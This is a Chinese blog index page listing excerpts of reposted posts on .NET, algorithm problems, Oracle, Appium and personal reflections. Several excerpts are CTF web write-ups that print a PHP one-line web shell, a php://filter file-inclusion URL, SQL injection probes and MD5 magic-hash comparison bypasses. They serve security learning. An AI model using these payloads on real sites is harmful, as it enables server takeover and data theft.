自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4452)

转载 NET Core 3.0 AutoFac替换内置DI的新姿势

  .NET Core 3.0 和 以往版本不同,替换AutoFac服务的方式有了一定的变化,在尝试着升级项目的时候出现了一些问题。  原来在NET Core 2.1时候,AutoFac返回一个IServiceProvider参数注入到ConfigureServices .NET Core 服务中,基本大痣是这样做的。  首先我们需要一个重写Autofac.Module的...

2019-09-29 16:47:00 273

转载 PHP反序列化利用

源自一道ctf题class xctf{public $flag = '111';public function __wakeup(){exit('bad requests');}?code=对序列化反序列化进行了理解。serialize()是序列化函数,它可以保存一个的所有 变量 ,但是不会保存对象的方法,只会保存类的名字。&l...

2019-09-26 18:48:00 44

转载 assert()理解

源自一道CTF题,理解全部写在注释里面if (isset($_GET['page'])) { $page = $_GET['page'];} else { $page = "home"; //}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!/...

2019-09-25 22:15:00 194

转载 [POI2013]MOR-Tales of seafaring

题意给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)(LG题意吼啊只要一句话)solution不一定是简单路径! 所以实际上两个点之间长度为d的路径其实是一条简单路径+一条边上的反复横跳syk大佬:所以只要求出任意两点间的奇偶最短路就好了为什么呢?显然 我们找一条奇偶性与d相同的最短简单路径,如果这条路径长度<d就TAK所以现在我...

2019-09-25 20:16:00 51

转载 [POI2013]LUK-Triumphal arch

由于syk大佬表示POI都是好题,于是我(被syk大佬一路暴踩后)来水水题解题意给一颗树,1号节点已经被染黑,其余是白的,两个人轮流操作,一开始B在1号节点,A选择k个点染黑,然后B走一步,如果B能走到A没染的节点则B胜,否则当A染完全部的点时,A胜。求能让A获胜的最小的ksolution二分答案,树形DP,首先二分k,将问题转化为判定性问题然后记DP[x]为在x的子树内博弈...

2019-09-25 20:02:00 35

转载 如何正视自己的劣势?面试!

面试真的是最直接面对自己劣势的方式,平时身边人看不清或者不愿意指出你的劣势,自己如果又不肯正视,那就会逐渐的积累成大问题。印象最深刻的是某小公司的技术终面,做的跟我完全同领域,面试官与我对切模型然后我败下阵来,临走的时候他说,“我们公司还是想招一个正经博士的。”那一刻我终于明白,作为一个博士,科研不行就是最大最大的劣势。能写程序,能做项目管理项目这些只能给科研锦上添花,但只有科研能力才是...

2019-09-25 17:06:00 31

转载 性能指标、

吞吐量吞吐量是指系统在单位时间内处理请求的数量tps每秒钟request/事务 数量并发数系统同时处理的request/事务数相应时间一般取平均响应时间QPS(TPS)= 并发数/平均响应时间QPS/TPSQPS:Queries Per Second意思是“每秒查询率”,是一台服务器每秒能够相应的查询次数,是对一个特定的查询服务器在规定时间内所处理流量多少的衡量标准。...

2019-09-25 16:25:00 36

转载 [CF1149C](Tree Generator)

题意给出一颗树的括号序,有m个操作,每次交换两个括号,保证交换后括号序仍然合法,输出每次操作后(包括未操作时)树的直径solution首先转化题目,对于一棵树的括号序,我们找到一段子串,满足将其中匹配的括号消去后剩下的括号最多,那么剩下的括号个数即为所求直径这样一棵树括号序为()(()) 取出)((,消去匹配括号后剩下3个括号,为所求直径但这样还是不可做nya,于是我...

2019-09-24 20:48:00 94

转载 app性能

性能获取办法appium+webview context + execute script +perfmance apiappium/selenium的ExecuteScript Api注入js:return JSON.stringify(window.performance.timing)JSON.stringify(window.performance.getEntries...

2019-09-24 01:24:00 124

转载 算法第二章上机报告

1.实践题目7-1二分查找(20 分)输入n值(1<=n<=1000)、n 个非降序排列的整数以及要查找的数x,使用二分查找算法查找x,输出x所在的下标(0~n-1)及比较次数。若x不存在,输出-1和比较次数。输入格式:输入共三行: 第一行是n值; 第二行是n 个整数; 第三行是x值。输出格式:输出x所在的下标(0~n-1)及比较次数。若x不存在,...

2019-09-23 23:50:00 26

转载 Netty学习(四)FastThreadLocal

FastThreadLocal前面介绍过 JDK 的 ThreadLocal , 使用不当的话容易造成内存泄漏最终导致OOM, 并且也有一些地方设计的不够好(相对于接下来要介绍的 FastThreadLocal), 接下来我们就介绍一下 Netty 改进的 FastThreadLocal, 看它到底 Fast 在哪里.(JDK 的 ThreadLocal 的地址: https://w...

2019-09-22 01:28:00 29

转载 构造函数

1.构造函数是用来做什么的?在面向对象编程的语言中,一般在定义了一个类型之后,为了能使用它,必须把这个类型具体化,也就是指定为一个具体的对象。举个例子:就是想画在图纸上的建筑模型,实现成为真正的高楼大厦。转载于:https://www.cnblogs.com/fmust/p/11564559.html...

2019-09-21 20:49:00 20

转载 PHP == 利用

<?php'a'==0 // true'12a'==12 //true'1'==1 //true'1aaaa55sss66'==1 //true1==true==“1” 更多参考https://www.cnblogs.com/wh4am1/p/6687199.html转载于:https://www.cnblogs.com/Zhu013/p/11562818...

2019-09-21 13:36:00 30

转载 内核编译

1. 内核下载地址官网链接:https://www.kernel.org/HTTP https://www.kernel.org/pub/GIT https://git.kernel.org/官网下载经常速度太慢,无法下载,提供另一个链接:http://ftp.sjtu.edu.cn/sites/ftp.kernel.org/pub/linux/kernel/ 2...

2019-09-20 10:52:00 84

转载 攻防世界 ics-05 write up

访问,由于提示说是后台,所以访问index.php/my-webshell(路径任意) 发现是文件包含页面http://111.198.29.45:42305/index.php/dsf?page=php://filter/read=convert.base64-encode/resource=index.phpbase64decode重点:if ($_SERVER['HTT...

2019-09-20 00:59:00 69

转载 攻防世界 Web_php_include write up

攻防世界 Web_php_include write updirbuster 扫目录 发现phpinfo()可以看到绝对路径 和 phpmyadmin进入phpmyadmin页面 root直接空密码登录查看phpmyadmin变量 secure file priv 值为空 说明可以写入一句话load_file()可以读取任意文件.......在经过各种尝试写人一...

2019-09-19 16:13:00 663

转载 攻防世界 web2 write up

#攻防世界 web2 write up minwen='a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws'#使用php函数从外到内#str_rot123() minwen-1 = 'n1mYotDfPRFRVdEYjhDNlZjYld2Y5IjOkdTN3EDNlhzM0gzZiFTZ2MjO4gj...

2019-09-17 14:29:00 75

转载 Mac安装stf

1.brew install rethinkdb graphicsmagick zeromq protobuf yasm pkg-config2.node版本8.x我的是8.15.03.npm install -g stf 或者cnpm install -g stf4.后天启动数据库:nohup rethinkdb &5.启动STF的客户端:stf local --pub...

2019-09-17 00:12:00 83

转载 通过银行卡号,识别相应的银行信息

https://github.com/navyxie/bankcardinfo/blob/master/index.js可以进行封装转载于:https://www.cnblogs.com/haoran5544/p/11526244.html

2019-09-16 11:01:00 121

转载 真正的聪明是什么?

不是傲,不是独,是善于利用身边一切可以利用的资源,高效的稳定的逼近自己的每个小目标。对,给自己逐步设置看得见正反馈的小目标。【有靠谱的小目标,随机搜索都能抵达终点,】除了既定的小目标,其他都是浮云,不要在意。我的唯一目的是学习,提升自己,这是老板给我的启发!转载于:https://www.cnblogs.com/LS1314/p/11520729.html...

2019-09-14 23:17:00 34

转载 02 Oracle 批量导出建表语句和数据

1、点击:工具------》导出表2、点击SQL插入,然后选中要导出的表(如果不选择表则导出全部表),选择导出文件的位置,点击导出。转载于:https://www.cnblogs.com/xiaonengxiong/p/11514575.html...

2019-09-12 18:35:00 74

转载 01 Oracle 导入SQL文件

1、检查并修改SQL文件里面的表空间等信息正确。例如我的SQL文件就需要批量替换表空间 :DATA_KHZX 改为 USERS2、然后打开cmd用相应的用户连接上数据库。相关命令: sqlplus username/password 如:普通用户登录 sqlplus scott/tiger sqlplus username/password a...

2019-09-12 18:32:00 28

转载 记一次mybatis-plus遇到的问题

在用了 springboot 和 mybatis-plus很久之后, 有一天突然看到配置文件有点繁杂, 想将相同的配置拉到application.yml里, 就在将配置拉过去后, 问题就开始出现了.在调用 baseMapper.method 的时候, 一直报 Invalid bound statement (not found), 有几个mapper能调用, 有几个mapper无法调用...

2019-09-12 15:03:00 79

转载 目标~最重要的事情

作者:北冥乘海生链接:https://zhuanlan.zhihu.com/p/82028811来源:知乎著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。接触的人多了,才发现这并非我的个例,龟兔赛跑故事在身边不断上演。因此,我想对25岁的年轻人说,没有比【想清人生目标、知道自己要做什么人】更重要的了。1-如何想清楚呢?成功者的传记并不可靠,那是他们衣锦还...

2019-09-10 21:19:00 29

转载 文件上传

显示 目录 <script language=php>system("ls")</script>一句话 <script language=php>echo 'a'; eval($_POST['flag']);</script>转载于:https://www.cnblogs.com/Zhu013/p/11494993.html...

2019-09-09 23:28:00 23

转载 统计代码行数

1、打开终端,用cd命令 定位到工程所在的目录。2、调用以下命令即可把每个源代码文件行数及总数统计出来(1)包括空行(会列出每个文件的代码行数):find . "(" -name "*.m" -or -name "*.mm" -or -name "*.c" -or -name "*.h" -or -name "*.xib" -or -name "*.pch" ")" -print | x...

2019-09-09 13:57:00 59

转载 自动化遍历-appcrawler

下载appclawler下载地址:https://pan.baidu.com/s/1dE0JDCH#list/path=%2F查看帮助文档:java -jar appcrawler-2.4.0-jar-with-dependencies.jarUsage: appcrawler [options] -a, --app <value> Android...

2019-09-08 21:54:00 275

转载 BUGKU 多次 手动注入+脚本盲注

本文内容为SQL手动注入步骤+想法,以及盲注脚本。http://123.206.87.240:9004/1ndex.php?id=1http://123.206.87.240:9004/1ndex.php?id=1'报错http://123.206.87.240:9004/1ndex.php?id=1'--+正常 存在注入http://123.206.87...

2019-09-08 18:19:00 64

转载 论美妙的共鸣

我来提供几个简单实用的思路吧。如果你想和别人有的聊,最为有效的一个解决方法大概是:分析自己知道什么,去发现对方知道什么,暗自合计一下你们共同知道的是什么。01比如,你发现对方和你都对动漫感兴趣;你们家是一个地方的;你们都喜欢打游戏;你们都喜欢悬疑类电影……怎么可能没得聊?即使你再不善言谈,对你所了解甚至熟悉的东西,总有不少话可以说,哪怕探讨一下最基础的状况描述,压根用不着高...

2019-09-07 09:56:00

转载 PHP MD5 SHA1 比较 漏洞绕过

一,md5()无法处理数组,如果传入为数组则返回为NULL二,利用==比较漏洞:  如果两个字符经MD5加密后为0exxxxx形式会被认为是科学计数法表示0*10的xxxx次方,值为零所以相等  以下例子MD5值是0e开头  QNKCDZO  240610708  s878926199a  s155964671a  s214587387a补充:strc...

2019-09-05 14:37:00 231

转载 PHP九大全局变量

$_POST [用于接收post提交的数据]$_GET [用于获取url地址栏的参数数据]$_FILES [用于文件就收的处理img 最常见]$_COOKIE [用于获取与setCookie()中的name 值]$_SESSION [用于存储session的值或获取session中的值]$_REQUEST [具有get,post的功能,但比较慢]S...

2019-09-05 10:31:00 27

转载 真诚不等于坦诚

有趣的问题及答案:https://www.zhihu.com/question/343898658(这个问题背后可以影射很多社会现象)人家没问的,我自认为可能是减分项的,暂时就先不说。人家问了的,我可以不完全说清楚,说一半留一半。不对。这件事情属于你的个人隐私,和很多事情一样,没有必要提前说。甚至可以永远不提。有人说母亲这样很理智,可以筛选掉在意这件事的人blablabla...

2019-09-05 09:38:00 31

转载 ASP.NET Core中使用Csp标头对抗Xss攻击

内容安全策略(CSP)是一个增加的安全层,可帮助检测和缓解某些类型的攻击,包括跨站点脚本(XSS)和数据注入攻击。这些攻击用于从数据窃取到站点破坏或恶意软件分发的所有内容(深入CSP)简而言之,CSP是网页控制允许加载哪些资源的一种方式。例如,页面可以显式声明允许从中加载JavaScript,CSS和图像资源。这有助于防止跨站点脚本(XSS)攻击等问题。它也可用于限制协议...

2019-09-04 16:00:00 42

转载 ThinkPHP胜出Laravel 近4倍,主流框架性能测试

主流PHP框架性能非权威测试作为一个PHP开发者,而且是初创企业团队的技术开发者,选择开发框架是个很艰难的事情。用ThinkPHP的话,招聘一个刚从培训机构出来的开发者就可以上手了,但是性能和后期代码解耦是个让人头疼的事情。不过很多第三方功能不需要自己写,众多大牛已经给铺好路了。用Laravel的话,传说写起来很爽扩展性也够,但是学习成本有点高,总不能给初级开发者半个月的时间去学习框架吧...

2019-09-04 10:31:00 133

转载 C# 读取Sqlite数据库的Datetime类型 会报错(时间格式不正确)

这个问题困扰了我N个小时,sqlite 用的是国际标准ISO 8601标准. 反正我是不知道什么原因,我的格式可是都是yyyyMMdd hhmmss格式的,没有什么长的不一样,最后在网上看到一个解决方案是 直接 ToString("s"),后来我同事使用的是js插入的数据,所以我不可以这样搞,只能改变数据类型..转载于:https://www.cnblogs.com/ZaraNe...

2019-09-03 16:55:00 150

转载 PWA最简单例子

PWA最简单例子。用最简单方法实现了多平台兼容的配置和离线缓存功能。其中主要用到Google的2个库实现这些功能,分别为pwacompat实现多平台兼容的配置和workbox-sw实现离线缓存功能。由于代码比较简单,就不作详细解析了,直接看源码就可快速上手:GitHub转载于:https://www.cnblogs.com/innwin/p/114...

2019-09-03 11:22:00 114

转载 Android adb实现原理

adb定义:adb(Android Debug Bridge) 安卓调试桥,包含adb client、adb server和adbd三部分。adb client:运行在PC上,即DDMS或者在Windows dos下启动的adb shelladb server:运行在PC上,作为adb client的server端,也作为adbd服务进程的客户端adbd 服务进程:运行在Andr...

2019-09-03 11:11:00 43

转载 算法第一章作业

1.请上网了解编码规范,说明你本学期的编码遵循哪个规范及该规范的链接 本学期我会遵循Google的编码规范,参考链接:https://blog.csdn.net/freeking101/article/details/789303812.请阅读《数学之美》,结合网上其他文章,谈谈算法在软件开发中的作用,本学期计划用算法实现一个什么软件 《数学之美》...

2019-09-02 21:09:00 1

转载 Git commit/pull/push的操作步骤

1.操作步骤需要严格执行如下顺序:commit->pull->push2.commit:将代码提交到本地仓库。3.pull:将远程仓库代码同步到本地仓库。如遇冲突,解决冲突,重复commit->pull,直到没有冲突。4.push:将本地仓库代码提交到远程仓库。具体讨论如下:本地和远程的关系相当于两个分支,你感觉一样是因为你git pull...

2019-08-31 14:57:00 83

转载 win安装appium

Windows 下配置 Appium,要提前装好jdk,请参考:https://jingyan.baidu.com/article/e8cdb32b2699cb37042bad59.html1.下载安装Android Studio---https://developer.android.google.cn/studio2.配置sdk环境变量:ANDROID_HOME=C:\User...

2019-08-30 12:40:00 63

空空如也

空空如也

空空如也
提示
确定要删除当前文章?
取消 删除